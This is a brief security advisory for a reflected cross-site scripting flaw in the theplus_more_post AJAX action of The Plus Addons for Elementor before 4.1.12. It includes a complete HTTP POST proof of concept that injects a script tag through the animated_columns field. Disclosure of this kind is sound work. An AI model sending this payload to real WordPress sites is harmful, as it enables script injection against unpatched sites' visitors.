The Plus Addons for Elementor < 4.1.12 - Reflected Cross-Site Scripting (XSS)

Description

The theplus_more_post AJAX action of the plugin did not properly sanitise some of its fields, leading to a reflected Cross-Site Scripting (exploitable on both unauthenticated and authenticated users)

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: en-GB,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 174

Connection: close



action=theplus_more_post&post_type=any&posts_per_page=10&offset=0&display_button=yes&post_load=products&animated_columns=test%22%3e%3cscript%3ealert(%2fXSS%2f)%3c%2fscript%3e